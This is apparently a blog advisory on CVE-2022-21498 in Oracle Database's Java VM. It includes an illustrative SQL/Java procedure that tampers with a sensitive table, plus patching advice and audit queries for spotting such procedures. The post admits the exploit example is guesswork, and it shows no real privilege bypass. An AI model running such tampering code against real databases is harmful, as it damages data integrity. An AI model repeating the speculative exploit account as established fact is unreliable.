On April 19, 2022, Oracle published a security advisory for CVE-2022-21498, detailing a serious vulnerability in the Java VM component of the Oracle Database Server. This flaw is easy to exploit, potentially allowing a low-privileged user who has the CREATE PROCEDURE privilege to gain unauthorized write access to critical data—all via network protocols. Supported Oracle Database versions affected by this vulnerability are 12.1..2, 19c, and 21c.

Let’s dig into the details, see how an exploit might work, and understand how to stay protected.

CVSS v3.1 Score: 6.5 (Moderate)

- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

- NIST NVD CVE-2022-21498
- Oracle Critical Patch Update Advisory - April 2022
- Full List of Oracle Database Security Patches

Impact

If you run Oracle Database with the Java VM enabled, a user with some coding skills and just the CREATE PROCEDURE privilege could:

- Compromise all data reachable through Java procedures.
- Do so without direct admin access; network reach is enough.

Technical Details (Exploit Example)

Note: Oracle has not released the complete exploit details for this vulnerability, but based on public info, here’s how an attack could look. The problem lies in how the Java VM executes user-defined code, which may permit altering data or objects unexpectedly.

- The target database is running the Oracle Java VM.
- The attacker creates a Java stored procedure that maliciously accesses and modifies sensitive tables.

Example: Malicious Java Procedure in Oracle

```sql
-- Step 1: Write Java code directly in the database
CREATE OR REPLACE AND COMPILE JAVA SOURCE NAMED "EvilClass" AS
public class EvilClass {
    public static void evilUpdate() throws Exception {
        // Server-side internal JDBC driver: runs inside the database session
        java.sql.Connection conn =
            java.sql.DriverManager.getConnection("jdbc:default:connection:");
        java.sql.Statement stmt = conn.createStatement();
        // Update critical table!
        stmt.executeUpdate("UPDATE sensitive_data SET owner='attacker'");
        stmt.close();
        conn.close();
    }
};
/

-- Step 2: Publish a PL/SQL wrapper around the Java method
CREATE OR REPLACE PROCEDURE evil_update
AS LANGUAGE JAVA
NAME 'EvilClass.evilUpdate()';
/

-- Step 3: Execute the malicious procedure
BEGIN
  evil_update();
END;
/
```

- The Java method executes an UPDATE (it could just as easily DELETE, INSERT, or even DROP tables).
- The PL/SQL wrapper publishes this Java method as an Oracle procedure. On execution, critical tables are silently modified.

Why is this bad? With only basic privileges, the attacker can use the Java VM *inside* Oracle to bypass normal access controls, manipulating or destroying data.

Note: Oracle Java VM procedures run with powerful permissions by default, unless DBAs have implemented strict sandboxing—most haven't.

Mitigation

Oracle's advice: patch immediately.

- The April 2022 Critical Patch Update fully addresses CVE-2022-21498.
- Revoke unnecessary CREATE PROCEDURE privileges.
- Disable or lock down the Java VM if it is not in use. The command below narrows what Java code can do by revoking file-system access from PUBLIC; it restricts Java permissions rather than disabling the JVM itself:

```sql
EXEC DBMS_JAVA.REVOKE_PERMISSION('PUBLIC', 'java.io.FilePermission', '/-', 'read,write,execute,delete');
```

- Monitor failed logins and unusual Java and PL/SQL activity.
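To act on the last two points, a DBA needs to know who can create procedures, which schemas already hold Java sources or Java-backed PL/SQL wrappers, and what the JVM lets PUBLIC do. The review queries below are an added example, not from the original post or from Oracle; they assume DBA access to the standard data dictionary views and the exclusion list of Oracle-supplied schemas is a constructed starting point to adjust per installation.

```sql
-- 1. Who holds CREATE PROCEDURE / CREATE ANY PROCEDURE, directly or via one
--    level of role grants (nested roles would need a CONNECT BY walk).
SELECT grantee, privilege, 'DIRECT' AS via_role
FROM   dba_sys_privs
WHERE  privilege IN ('CREATE PROCEDURE', 'CREATE ANY PROCEDURE')
UNION ALL
SELECT rp.grantee, sp.privilege, rp.granted_role AS via_role
FROM   dba_role_privs rp
JOIN   dba_sys_privs  sp ON sp.grantee = rp.granted_role
WHERE  sp.privilege IN ('CREATE PROCEDURE', 'CREATE ANY PROCEDURE')
ORDER  BY grantee, privilege;

-- 2. Java sources and classes outside Oracle-supplied schemas, newest first.
--    A Java source in an application schema that nobody can explain is the
--    footprint of Step 1 above.
SELECT owner, object_name, object_type, created, last_ddl_time
FROM   dba_objects
WHERE  object_type IN ('JAVA SOURCE', 'JAVA CLASS')
AND    owner NOT IN ('SYS', 'SYSTEM', 'MDSYS', 'ORDSYS', 'XDB', 'CTXSYS')
ORDER  BY last_ddl_time DESC;

-- 3. PL/SQL wrappers that publish Java methods (the Step 2 pattern):
--    any unit whose source carries a LANGUAGE JAVA call spec.
SELECT owner, name, type, line, text
FROM   dba_source
WHERE  type IN ('PROCEDURE', 'FUNCTION', 'PACKAGE BODY')
AND    UPPER(text) LIKE '%LANGUAGE JAVA%'
AND    owner NOT IN ('SYS', 'SYSTEM', 'MDSYS', 'ORDSYS', 'XDB', 'CTXSYS')
ORDER  BY owner, name, line;

-- 4. Java permissions currently granted to PUBLIC. Anything broader than the
--    application needs (file, socket, runtime permissions) is a candidate
--    for DBMS_JAVA.REVOKE_PERMISSION as shown in the mitigation list.
SELECT kind, grantee, type_name, name, action, enabled
FROM   dba_java_policy
WHERE  grantee = 'PUBLIC'
ORDER  BY type_name, name;
```

Run these before and after applying the CPU and compare the output; a new row in query 2 or 3 from a non-DBA schema is the kind of "unusual Java/PL/SQL activity" worth an alert.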

Conclusion

CVE-2022-21498 is a textbook example of how legacy or rarely-used features (like Java VM in Oracle) can cause big headaches when not properly secured. Attackers with only minimal privileges and no direct admin access can use easy procedural tricks to seriously compromise database integrity. If you run Oracle Database (12.1..2, 19c, or 21c), patch now and review all low-privilege users who have the CREATE PROCEDURE permission.

Further Reading

- Oracle Java in the Database - Security Overview
- CERT Vulnerability Note VU#227812
- Oracle Database Security Best Practices

If you have any questions or want advice on identifying risks in your Oracle deployment, let us know in the comments!

Timeline

Published on: 04/19/2022 21:15:00 UTC
Last modified on: 04/28/2022 15:52:00 UTC